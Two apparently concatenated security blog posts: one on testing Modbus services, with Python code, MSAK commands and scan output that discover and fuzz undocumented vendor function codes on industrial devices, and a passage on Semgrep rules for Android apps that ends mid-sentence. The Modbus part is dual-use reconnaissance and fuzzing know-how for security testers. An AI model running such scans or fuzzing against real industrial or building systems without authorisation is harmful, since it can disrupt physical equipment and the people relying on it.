<h2 style="text-align: left;">Testing the Security of Modbus Services</h2>
<p><span style="font-family: verdana; font-size: medium;">IMQ Minded Security Blog, 2024-03-06</span></p>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right;">
<tbody>
<tr>
<td style="text-align: center;">
<span style="font-size: medium;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjtPDsHTU_40xbA4tMMARNyxJZu0USyUlzoYEpX4CYah14yXlEVLZR6z1N-Hyjiymo4za3D_cURAyM0or3FtLoEONbj-BUp3d3aJJcJxoxgoZmG2n5U93cHXZCaa0mFa0csDUlVtiOl68jsL-58f4rl2wiZCXoQRo-I059Xd76Ekjct9y6vq9JydE1i4/s569/BMS_ModBus.png" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img data-original-height="569" data-original-width="532" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjtPDsHTU_40xbA4tMMARNyxJZu0USyUlzoYEpX4CYah14yXlEVLZR6z1N-Hyjiymo4za3D_cURAyM0or3FtLoEONbj-BUp3d3aJJcJxoxgoZmG2n5U93cHXZCaa0mFa0csDUlVtiOl68jsL-58f4rl2wiZCXoQRo-I059Xd76Ekjct9y6vq9JydE1i4/w299-h320/BMS_ModBus.png" style="border: 0pt 0pt 0pt 0pt;" width="299" /></a>
</span></td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;"></td>
</tr>
</tbody>
</table>
<span style="font-size: medium;"><br /></span><p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">ICS and Building Management Systems (BMS) support several protocols such as
<i><b>Modbus</b></i>, <i>BACnet</i>, <i>Fieldbus</i> and so on. Those protocols were designed to provide read/write control over sensors and actuators from a central point.
</span></p><p style="text-align: left;"></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
Driven by our past experience with BMS, we decided to release
our own methodology and internal tool used for proactive attack surface
analysis within systems supporting the Modbus protocol.
</span></p>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">The Modbus Protocol</span></h3>
<p style="text-align: left;">
<span style="font-family: verdana; font-size: medium;"><a href="https://en.wikipedia.org/wiki/Modbus" target="_blank">Modbus</a> is a
well defined protocol described on
<a href="https://modbus.org/specs.php" target="_blank">modbus.org</a>. It
was created in 1979 and has become one of the most used standards for
communication between industrial electronic devices in a wide range of buses
and networks.
</span></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
It can be used over a variety of communication media, including serial, TCP,
UDP and others.
</span></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
The application part of the protocol is quite simple. In particular, the part
we are interested in is its Protocol Data Unit (PDU), which is independent of
the lower layer protocols and is defined as follows:
</span></p>
<p style="text-align: center;"></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;"></span></p><blockquote><span style="font-family: verdana; font-size: medium;">| FUNCTION CODE | DATA |</span></blockquote><p></p>
<p style="text-align: left;"></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
Where <i>FUNCTION CODE</i> is a
<i>1 byte value in the range 1-127 (0x01-0x7F)</i> (the range 128-255, 0x80-0xFF, is reserved for exception responses), and <i>DATA</i> is a sequence
of bytes whose layout depends on the function code.
</span></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
Here is a set of function codes already defined by the protocol specification:
</span></p>
<p></p>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: verdana; font-size: medium;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiQLA-21SSyWWIjvhqq8WGpypkbuMO8Lk2S2jR8gcPsRaWTNu17-hP15qWqsLp_xivwrZ6LsCC7MUw9xd_VWoxbviIz-IXhnl5uikmO5rcyReEBFT_fUCS8FhdKCSc5MrdCZzNi2XHKu77uklyvKDxZ91rDsVnySjSJDn0-7EURHqQLAHg40DIXXZuQjgk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="675" data-original-width="996" height="434" src="https://blogger.googleusercontent.com/img/a/AVvXsEiQLA-21SSyWWIjvhqq8WGpypkbuMO8Lk2S2jR8gcPsRaWTNu17-hP15qWqsLp_xivwrZ6LsCC7MUw9xd_VWoxbviIz-IXhnl5uikmO5rcyReEBFT_fUCS8FhdKCSc5MrdCZzNi2XHKu77uklyvKDxZ91rDsVnySjSJDn0-7EURHqQLAHg40DIXXZuQjgk=w640-h434" width="640" /></a>
</span></div>
<span style="font-family: verdana; font-size: medium;"><br />
</span><p><span style="font-family: verdana; font-size: medium;">
By setting a specific function code together with its expected set of data
field values, it is possible to read/write the status of coils, inputs
and registers, or to access other interesting information such as
diagnostic data.
</span></p>
<p><span style="font-family: verdana; font-size: medium;">
For example, the following request queries the status of 2 <span style="background-color: white;">coils starting from address 0x0033 in a remote device:</span>
</span></p>
<p><span style="background-color: white; font-family: verdana; font-size: medium;"></span></p>
<blockquote><span style="font-family: verdana; font-size: medium;"> \x01\x01\x00\x33\x00\x02 </span></blockquote>
<p></p>
<p><span style="background-color: white; font-family: verdana; font-size: medium;">Where:</span></p>
<p><span style="background-color: white; font-family: verdana; font-size: medium;"></span></p>
<blockquote><span style="font-family: verdana; font-size: medium;">
| \x01 [<b>SlaveId</b>] | \x01 [<b>Function Code</b>] | \x00\x33 [<b>Address</b>] | \x00\x02
[<b>Quantity</b>] |
</span></blockquote>
<p><span style="font-family: verdana; font-size: medium;">Note that only the function code and the data bytes form the PDU: the leading SlaveId byte (and the trailing CRC, omitted above) belong to the serial-line frame that wraps it, while over Modbus/TCP the PDU is preceded by the MBAP header and no CRC is sent.</span></p>
<p></p>
<p>
<span style="font-family: verdana; font-size: medium;"><span style="background-color: white;"><br /></span>
</span></p>
<p>
<span style="font-family: verdana; font-size: medium;">As can be noticed, this is quite similar to a modern API-based application: the name of the function and its arguments:
</span></p>
<p></p>
<blockquote><i><span style="font-family: verdana; font-size: medium;">Protocol://URL/<b>EndPoint</b>?<b>Parameters</b>=<b>Values</b>..</span></i></blockquote>
<p><span style="font-family: verdana; font-size: medium;">
Apart from the public function codes, two ranges are left as <i>user-defined
function codes</i>: they are <u>reserved</u> for vendor implementations, but their semantics are not defined by the standard.
</span></p>
<p></p>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: verdana; font-size: medium;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjZ23-p_YeYWL_smGaf6c6V9an46z_1Ge0MA9aKlLurjF3xoXaAK427syK0rS9ZeaQ25iUo8izatZkG8YZRF4gALEmVrQgRYItHPC_Q0YtoajS8vdQGr6oD_MvYIYN5tcO1jrn9RhmmCnMgyX4Ii0l33K9BBs-CgxJ2An51det1A2Qc-lLipjKWxyoxGU8" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="390" data-original-width="368" height="320" src="https://blogger.googleusercontent.com/img/a/AVvXsEjZ23-p_YeYWL_smGaf6c6V9an46z_1Ge0MA9aKlLurjF3xoXaAK427syK0rS9ZeaQ25iUo8izatZkG8YZRF4gALEmVrQgRYItHPC_Q0YtoajS8vdQGr6oD_MvYIYN5tcO1jrn9RhmmCnMgyX4Ii0l33K9BBs-CgxJ2An51det1A2Qc-lLipjKWxyoxGU8=w302-h320" width="302" /></a>
</span></div>
<span style="font-family: verdana; font-size: medium;"><br />
</span><div style="text-align: left;"><span style="font-family: verdana; font-size: medium;"><br /></span></div><div style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
In particular <i>65-72 (0x41-0x48)</i>, and
<i>100-110 (0x64-0x6e), for a total of 19 </i>function codes, are left to
the vendor/manufacturer for custom implementations.</span></div><div style="text-align: left;"><span style="font-size: medium;"><span style="font-family: verdana;"><br />
</span><span style="font-family: verdana;">While some vendors publish the specification of their custom functions in their manuals, with all the
expected arguments and formats, others do not release any information.<br />
</span><span style="font-family: verdana;">From a security tester's point of view, the first questions are:</span></span></div>
<ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;">
How can we identify whether a <i><b>custom</b></i> Function Code <b>is implemented</b> when no details
are available?
</span></li><li><span style="font-family: verdana; font-size: medium;">How can we find the correct set of <i><b>expected arguments</b></i>?</span></li><li><span style="font-family: verdana; font-size: medium;">How can we <i><b>fuzz the arguments</b></i> to find security issues?</span></li></ul>
<div>
<p style="text-align: left;"></p>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">Modbus Attack Surface</span></h3>
<div style="text-align: left;"><span style="font-family: verdana; font-size: medium;">As defined by the standard, if the client request contains an error, the slave answers with an exception response carrying a specific exception code:</span></div>
<p></p>
<blockquote><span style="font-family: verdana; font-size: medium;">
| 0x80 + [Request Function Code] | 0xHH [<b><i>Exception Code</i></b>] | ... |
</span></blockquote>
<p></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">Where the exception codes are the following:</span></p>
<div class="separator" style="clear: both; text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: verdana; font-size: medium;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiNhvXjVFuK6QIlpa5EdJvjIyS6oXInfqyPetjnj5yBzlZRq7i-tXFZ5ZcXXEB2s0XUTV5-BZoEk_0-YM4ZCveW3yg8I4n-khbZ3-QDDzrgMAphIgKUTMsmMZfvSlZeCB703j23fc2CtyB8g72oBSSIuRHXc-FulSo5a88TckEToYYvf9rSNGIrnw5S23Y" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="630" data-original-width="771" height="523" src="https://blogger.googleusercontent.com/img/a/AVvXsEiNhvXjVFuK6QIlpa5EdJvjIyS6oXInfqyPetjnj5yBzlZRq7i-tXFZ5ZcXXEB2s0XUTV5-BZoEk_0-YM4ZCveW3yg8I4n-khbZ3-QDDzrgMAphIgKUTMsmMZfvSlZeCB703j23fc2CtyB8g72oBSSIuRHXc-FulSo5a88TckEToYYvf9rSNGIrnw5S23Y=w640-h523" width="640" /></a>
</span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: verdana; font-size: medium;"><br /></span></div>
</div>
<div><span style="font-family: verdana; font-size: medium;"><br /></span></div><p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">This behavior helps when testing and identifying the exposed services.</span></p><p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">In particular, the first three exception codes help identify the presence of a custom function code:</span></p><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;"><b>0x01 Illegal Function</b>: the function code is not an allowable action for the server, either because it is not implemented or because the server is in the wrong state to process it.</span></li><li><span style="font-family: verdana; font-size: medium;"><b>0x02 Illegal Data Address</b>: the function exists, but the address in the request is not valid for the server.</span></li><li><span style="font-family: verdana; font-size: medium;"><b>0x03 Illegal Data Value</b>: the function exists, but a value in the data field (an argument, or the length of the request) is not valid.</span></li></ul><p></p>
<p></p>
<div><span style="font-family: verdana; font-size: medium;">As you may have already guessed, 0x02 and 0x03 responses reveal the presence of a custom function!</span></div><div><span style="font-family: verdana; font-size: medium;">On the other hand, 0x01 does not prove that there is no custom implementation of the requested function: it may just be unavailable in the current state of the device, and that will require some more analysis effort.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div>
<p></p>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">The Methodology</span></h3>
<p><span style="font-family: verdana; font-size: medium;">
Apart from public function codes, where it would be quite easy to check for
read/write access to data, we want to identify if there's a set of
implemented custom function codes on a black box system.
</span></p>
<p><span style="font-family: verdana; font-size: medium;">We decide whether a function code is implemented by sending a request for each candidate function code and analyzing the response:
</span></p>
<pre><code style="border-radius: 10px;">for code in function_codes:
    resp = send(code)
    if has_exception(resp):
        switch(exception(resp)):
            case 0x01:  # ILLEGAL FUNCTION
                # Function does not exist (maybe)!
                break
            case 0x02:  # ILLEGAL DATA ADDRESS
                # Function exists!
                break
            case 0x03:  # ILLEGAL DATA VALUE
                # Function exists!
                break
            default:    # other codes..
                break
    else:
        # Function exists and accepted the request
</code></pre>
<p><span style="font-family: verdana; font-size: medium;">The previous pseudocode shows the approach we use to identify whether a custom function is implemented, and therefore where we should fuzz.</span></p>
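<p><span style="font-family: verdana; font-size: medium;">The scan in the pseudocode above, the serial-line framing of the Read Coils request from the previous section and the argument sweep used later in the Tool section, as one added Python example. This is not code from the original post nor from MSAK. The CRC-16 and the exception-response layout follow the Modbus serial-line and application specifications; the <code>SimulatedSlave</code>, its 64 coils and the semantics of the vendor function 0x69 (a single 16-bit argument, two accepted values) are constructed assumptions standing in for a black-box device, and <code>send</code> is any callable that takes a request frame and returns the response frame, for instance a wrapper around a serial port.</span></p>

```python
import struct

# Exception codes from the Modbus application protocol specification
ILLEGAL_FUNCTION, ILLEGAL_DATA_ADDRESS, ILLEGAL_DATA_VALUE = 0x01, 0x02, 0x03
LABELS = {ILLEGAL_FUNCTION: "ILLEGAL FUNCTION",
          ILLEGAL_DATA_ADDRESS: "ILLEGAL DATA ADDRESS",
          ILLEGAL_DATA_VALUE: "ILLEGAL DATA VALUE"}

def crc16(data: bytes) -> int:
    """Modbus RTU CRC-16: initial value 0xFFFF, reflected polynomial 0xA001."""
    crc = 0xFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc

def build_rtu_frame(slave_id: int, function_code: int, data: bytes) -> bytes:
    """Serial-line ADU: | SlaveId | PDU = function code + data | CRC, low byte first |"""
    adu = bytes([slave_id, function_code]) + data
    return adu + struct.pack("<H", crc16(adu))

def parse_rtu_frame(frame: bytes):
    """Check the CRC and return (slave_id, function_code, exception_code_or_None, data).
    An exception response carries 0x80 + the request function code, then one exception byte."""
    if len(frame) < 4:
        raise ValueError("frame too short")
    body, crc = frame[:-2], struct.unpack("<H", frame[-2:])[0]
    if crc16(body) != crc:
        raise ValueError("bad CRC")
    slave_id, fc = body[0], body[1]
    if fc & 0x80:
        return slave_id, fc & 0x7F, body[2], b""
    return slave_id, fc, None, body[2:]

class SimulatedSlave:
    """Constructed stand-in for a black-box device (not a real product): Read Coils (0x01)
    plus an undocumented vendor function 0x69 that takes one big-endian 16-bit argument
    and accepts only two values (both assumptions made for this example)."""
    VENDOR_ARGS = {0x36FF: b"\x01", 0x3700: b"\x00"}

    def __init__(self, slave_id: int = 1, coils: int = 64):
        self.slave_id = slave_id
        self.coils = [False] * coils

    def handle(self, request: bytes) -> bytes:
        _, fc, _, data = parse_rtu_frame(request)
        ok = lambda payload: build_rtu_frame(self.slave_id, fc, payload)
        exc = lambda code: build_rtu_frame(self.slave_id, fc | 0x80, bytes([code]))
        if fc == 0x01:  # Read Coils: | start address (2) | quantity (2) |
            if len(data) != 4:
                return exc(ILLEGAL_DATA_VALUE)
            addr, qty = struct.unpack(">HH", data)
            if not 1 <= qty <= 2000:
                return exc(ILLEGAL_DATA_VALUE)
            if addr + qty > len(self.coils):
                return exc(ILLEGAL_DATA_ADDRESS)
            out = bytearray((qty + 7) // 8)  # coil status bits, LSB first
            for i, on in enumerate(self.coils[addr:addr + qty]):
                out[i // 8] |= on << (i % 8)
            return ok(bytes([len(out)]) + bytes(out))
        if fc == 0x69:  # undocumented vendor function: exactly one 16-bit argument
            if len(data) != 2:
                return exc(ILLEGAL_DATA_VALUE)
            status = self.VENDOR_ARGS.get(struct.unpack(">H", data)[0])
            return ok(status) if status is not None else exc(ILLEGAL_DATA_ADDRESS)
        return exc(ILLEGAL_FUNCTION)

def classify(response: bytes) -> str:
    """Label used to group results, mirroring the summary printed by the tool."""
    exc_code = parse_rtu_frame(response)[2]
    if exc_code is None:
        return "ACCEPTED_WITH_RESPONSE"
    return LABELS.get(exc_code, "EXCEPTION_0x%02X" % exc_code)

def scan_function_codes(send, slave_id: int = 1, probe: bytes = b"\x00\x01") -> dict:
    """The pseudocode above as code: one probe per function code 1..127, grouped by
    response class; only ILLEGAL FUNCTION means 'probably absent'."""
    groups = {}
    for fc in range(1, 128):
        response = send(build_rtu_frame(slave_id, fc, probe))
        groups.setdefault(classify(response), []).append(fc)
    return groups

def sweep_argument(send, fc: int, start: int, end: int, fmt: str = ">H", slave_id: int = 1) -> dict:
    """Argument fuzzing for one function code, like the R[start,end,fmt] template used
    later in the text: every value from start to end inclusive, packed with fmt."""
    groups = {}
    for value in range(start, end + 1):
        response = send(build_rtu_frame(slave_id, fc, struct.pack(fmt, value)))
        groups.setdefault(classify(response), []).append(value)
    return groups

if __name__ == "__main__":
    slave = SimulatedSlave()
    slave.coils[0x34] = True
    print(parse_rtu_frame(slave.handle(build_rtu_frame(1, 0x01, b"\x00\x33\x00\x02"))))
    print(scan_function_codes(slave.handle))
    print(sweep_argument(slave.handle, 0x69, 0x0000, 0xFFFF)["ACCEPTED_WITH_RESPONSE"])
```

<p><span style="font-family: verdana; font-size: medium;">Against the simulated device the scan puts function code 1 under ILLEGAL DATA VALUE (the 2-byte probe is too short for Read Coils), 0x69 under ILLEGAL DATA ADDRESS and everything else under ILLEGAL FUNCTION, so both 0x01 and 0x69 are reported as implemented; the sweep of 0x69 then isolates the two argument values the device accepts. Replace <code>slave.handle</code> with a function that writes the frame to the serial port and reads back the reply to run the same logic against real hardware, treating a read timeout as a fourth response class.</span></p>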
</div>
<div>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">The Tool</span></h3>
<div><span style="font-family: verdana; font-size: medium;">Here comes <a href="https://github.com/mindedsecurity/msak" target="_blank">M-SAK (the Modbus Swiss Army Knife)</a>, a command line tool and library that helps scanning for and identifying custom functions on a Modbus device.</span></div><div><span style="font-family: verdana; font-size: medium;">MSAK is written in Python and helps discovering and testing the exposed standard and custom services of Modbus servers/slaves over serial or TCP/IP connections.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">It also offers a highly customizable payload generator that helps the tester perform complex scans using a simple but powerful templating format.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">MSAK can help in:</span></div><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;"><i><b>finding</b> undocumented functions</i></span></li><li><span style="font-family: verdana; font-size: medium;"><b><i>fuzzing</i></b> <i>the arguments</i> in order to find security issues or weird behavior.</span></li></ul><div><span style="font-family: verdana; font-size: medium;">For example, to scan all functions we can just use the Service Scan option, which sends the given payload with every function code in the range 1-127 and then prints a summary grouped by response:</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div>
<pre><code style="border-radius: 10px;">$ python3 msak.py -S -d '0001'
Requested Data \x01\x01\x00\x01\x91\xD8
..
Requested Data \x01\x02\x00\x01\x91\xD8
..
Requested Data \x01\x03\x00\x01\x91\xD8
...
Requested Data \x01\x64\x00\x01\x91\xD8
...
ILLEGAL DATA VALUE
    1 (0x01) Read Coils [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
    2 (0x02) Read Discrete Inputs [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
    3 (0x03) Read Holding Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
    4 (0x04) Read Input Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
    15 (0x0F) Write Multiple Coils [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|BYTE VALS >BHHBN*B]
    16 (0x10) Write Multiple registers [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|VALS >BHHBN*H]
    20 (0x14) Read File Record
ACCEPTED_WITH_RESPONSE
    5 (0x05) Write Single Coil [FUN_ID|ADDRESS|COIL VALUE| >BHH]
    6 (0x06) Write Single Register [FUN_ID|ADDRESS|REG VALUE| >BHH]
    17 (0x11) Report Server ID (Serial Line only) [FUN_ID >B]
    105 CUSTOM
ILLEGAL FUNCTION
    7 (0x07) Read Exception Status (Serial Line only) [FUN_ID >B]
    8 (0x08) Diagnostics (Serial Line only) [|FUN_ID|SUB_FUN|VALUES| >BHN*H]
    9 CUSTOM
    10 CUSTOM
    11 (0x0B) Get Comm Event Counter (Serial Line only) [FUN_ID >B]
    12 (0x0C) Get Comm Event Log (Serial Line only) [FUN_ID >B]
    13 CUSTOM
....
ILLEGAL DATA ADDRESS
    21 (0x15) Write File Record
</code></pre>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">The result shows that a custom function 105 (0x69) is implemented: the device does not answer it with ILLEGAL FUNCTION (0x01). In this run it even accepted the probe payload (it is listed under ACCEPTED_WITH_RESPONSE); a 0x02 or 0x03 exception would have revealed it just as well. We can now try to find the correct set of arguments through fuzzing, using the following command:</span></p>
<pre><code style="border-radius: 10px;">$ python3 msak.py -C -d '0169{R[0,0xFFFF,">H"]}'</code></pre>
<div><span style="font-family: verdana; font-size: medium;">This sends 65536 requests, one for each argument value from 0 to 65535, and collects the responses. In fact:</span></div><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;">0x01 is the slave ID</span></li><li><span style="font-family: verdana; font-size: medium;">0x69 is the custom function code</span></li><li><span style="font-family: verdana; font-size: medium;">R[0,0xFFFF,">H"] generates the sequence of values 0-65535, each packed as a 2-byte big-endian integer (">H" is the Python struct format: ">" means big-endian, "H" an unsigned 16-bit value)</span></li><li><span style="font-family: verdana; font-size: medium;">the requests are sent over the serial port and the CRC of each frame is computed automatically.</span></li></ul><div><span style="font-family: verdana; font-size: medium;">After the whole scan, MSAK will return an output similar to the following:</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div>
<pre><code style="border-radius: 10px;">{
'NO_RESPONSE':
    [ ...
      b'\x01\x69\x36\xfe',
      ...
    ],
'ACCEPTED_WITH_RESPONSE':
    [ b'\x01\x69\x36\xff',
      b'\x01\x69\x37\x00',
      ...
    ]
}
</code></pre>
<div><span style="font-family: verdana; font-size: medium;">We have found that the undocumented function responds to the argument values \x36\xff and \x37\x00!</span></div><div><span style="font-family: verdana; font-size: medium;">The next step is to play with this new function and see if there's some way to abuse it... What could go wrong if an undocumented function for firmware update is found, right?! :P</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">For more information, the fuzzing engine supports several template patterns, documented in the MSAK <a href="https://github.com/mindedsecurity/msak?tab=readme-ov-file#custom-scan" target="_blank">README</a> file.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">N.B.: The fuzzing template engine is also available as a separate Python library called <a href="https://github.com/mindedsecurity/simple_payload_generator">Simple Payload Generator</a>.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">Conclusions</span></h3>
<div><span style="font-family: verdana; font-size: medium;">Although Modbus is a quite old protocol, it is still used in Building Management Systems, Industrial Control Systems and SCADA systems. </span></div><div><span style="font-family: verdana; font-size: medium;">Apart from the well defined functions used to read/write sensors and controls, which can already lead to very interesting security issues, the standard leaves plenty of room for vendors to implement their own services, and those might be even more interesting from a security point of view!</span></div><div><span style="font-family: verdana; font-size: medium;">That's where MSAK gives its best, by automating the boring part and leaving all the fun to the tester!</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">Feel free to send us your feedback and happy hacking!</span></div>
<div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><b style="font-family: verdana; font-size: large;">Author</b><span style="font-family: verdana; font-size: large;">: Stefano Di Paola </span></div>
<div><span style="font-family: verdana; font-size: medium;"><b>Twitter</b>: <a href="https://twitter.com/wisecwisec" target="_blank">@WisecWisec</a> </span></div>
</div>
<h2 style="text-align: left;">Semgrep Rules for Android Application Security</h2>
<p>IMQ Minded Security Blog, 2023-10-23</p><!--Library for highlighting-->
<link href="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.8.0/build/styles/nord.min.css" rel="stylesheet"></link>
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.8.0/build/highlight.min.js"></script>
<!--and it's easy to individually load additional languages-->
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.8.0/build/languages/go.min.js"></script>
<h2 style="text-align: left;">Introduction</h2><p></p><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqKNYmEPnpcNBEXzKE7L9L8Z3vMbGd70W0XIXLj48ru63EH1VB_Jlv5DF2vctrykGOBv9H9Ob_08OxOzPDNFJx6IBD1mTpbNOA5Pza7mJEv1D4GciPW8dLxEVMMNWAjOQ70RlNYmwJMhpP-Z08X-4yXe61CtZW6x9NXbqPqNDCQgiOJcIzZmGWLTarQU/s1024/android_image.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqKNYmEPnpcNBEXzKE7L9L8Z3vMbGd70W0XIXLj48ru63EH1VB_Jlv5DF2vctrykGOBv9H9Ob_08OxOzPDNFJx6IBD1mTpbNOA5Pza7mJEv1D4GciPW8dLxEVMMNWAjOQ70RlNYmwJMhpP-Z08X-4yXe61CtZW6x9NXbqPqNDCQgiOJcIzZmGWLTarQU/w308-h308/android_image.png" width="308" /></a></div><p>The number of Android applications has been growing rapidly in recent years. In 2022, there were over <b>3.55 million</b> <b>Android apps</b> available in the Google Play Store, and this number is expected to continue to grow in the years to come. The expansion of the Android app market is being driven by a number of factors, including the increasing popularity of smartphones, the growing demand for mobile apps, and the ease of developing and publishing Android apps. At the same time, the number of Android app downloads is also growing rapidly. In 2022, there were over <b>255 billion</b> Android app <b>downloads</b> worldwide.</p><p>For this reason, introducing automatic security controls during Mobile Application Penetration Testing (MAPT) activities and in the CI phase is necessary to ensure the security of Android apps, by scanning for vulnerabilities before merging into the main repository.</p><h2 style="text-align: left;">Decompiling Android Packages</h2><p>The compilation of Android applications is a multi-step process that involves different bytecodes, compilers, and execution engines. 
Generally speaking, a common compilation flow is divided into three phases:</p><p></p><ol style="text-align: left;"><li><b>Precompilation</b>: The Java source code (".java") is converted into Java bytecode (".class").</li><li><b>Postcompilation</b>: The Java bytecode is converted into Dalvik bytecode (".dex").</li><li><b>Release</b>: The ".dex" and resource files are packed, signed and compressed into the Android App Package (<b>APK</b>).</li></ol><p></p><p>Finally, the Dalvik bytecode is executed by the Android Runtime (ART).</p><p>Generally, the target of a Mobile Application Penetration Testing (MAPT) activity is in the form of an APK file. Decompiling both of the aforementioned bytecodes is possible and can be performed with tools such as <a href="https://github.com/skylot/jadx" target="_blank">Jadx</a>, which turns the Dalvik bytecode in an APK back into Java source:</p>
<pre><code style="border-radius: 10px;">jadx -d ./out-dir target.apk</code></pre>
<p></p><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">OWASP MAS</h2><div><div>The <a href="https://mas.owasp.org/" target="_blank">OWASP MAS</a> project is a valuable resource for mobile security professionals, providing a comprehensive set of resources to enhance the security of mobile apps. The project includes several key components:</div><div><ul style="text-align: left;"><li><b>OWASP MASVS</b>: This resource outlines requirements for software architects and developers who aim to create secure mobile applications. It establishes an <b>industry standard</b> that can be used as a benchmark in mobile app security assessments. Additionally, it clarifies the role of software protection mechanisms in mobile security and offers requirements to verify their effectiveness.</li></ul><ul style="text-align: left;"><li><b>OWASP MASTG</b>: This comprehensive manual covers the processes, techniques, and tools used during mobile application security analysis. It also includes an exhaustive set of <b>test cases</b> for verifying the requirements outlined in the OWASP Mobile Application Security Verification Standard (MASVS). 
This serves as a foundational basis for conducting thorough and consistent security tests.</li></ul><ul style="text-align: left;"><li><b>OWASP MAS Checklist</b>: This checklist aligns with the tests described in the MASTG and provides an output template for mobile security testing.</li></ul></div></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><span style="margin-left: auto; margin-right: auto;"><a href="goog_142454313"><img alt="OWASP MAS" border="0" data-original-height="448" data-original-width="1171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdKu4Zh5wr5AX_VDzDIKJ4OxF1_nfAY0N6KYHhjv5tHJzptABxQ_5QcPgBu4VbmBWRO8NAy6PrDN_z8kwF_WTkCbabyQF1Kuvm8Vb9f9ywXGm9xfyyFACFGlWFTRRU1eNn9PQ8sV1IdAffzkQmGVc0cfPxyYyqsXOWD5qnCi4cjtn4WyKCW6xXcxOnuA/s16000/owasp_mas.png" /></a></span></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://mas.owasp.org/">https://mas.owasp.org/</a></td></tr></tbody></table><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Semgrep</h2><p style="text-align: left;"><a href="https://semgrep.dev/" target="_blank">Semgrep</a> is a Static Application Security Testing (SAST) tool that performs <b>intra-file analysis</b>: you define code patterns that detect misconfigurations or security issues, and Semgrep matches them against one file at a time, in isolation. Some advantages of using Semgrep include:</p><div><div><ul><li>It does not require the source code to be uploaded to an external cloud.</li><li>It does not require the target source code to be buildable or to have all of its dependencies available. 
It can work on a single source file.</li><li>It is exceptionally <b>fast</b>.</li><li>It allows you to write your <b>custom patterns</b> very easily.</li></ul></div><div>Once Semgrep is integrated into your <b>CI pipeline</b>, it automatically scans your code for potential vulnerabilities every time you commit changes. This helps identify and address vulnerabilities early in the development process, improving your software's security.</div></div><div><br /></div><div><h4>Key Insights on Semgrep</h4><div><div><div>First of all, install Semgrep with the following command:</div><div><pre><code style="border-radius: 10px;">python3 -m pip install semgrep</code></pre></div><div>Semgrep accepts two fundamental inputs:</div><div><ul style="text-align: left;"><li><b>Rules collection</b>: A collection is composed of ".yaml" files, also referred to as "rules". A rule includes a series of patterns designed to identify or exclude specific elements within the target source code.</li><li><b>Target source code</b>: This denotes the source code subject to analysis. It may also be partial code, or code with some dependencies 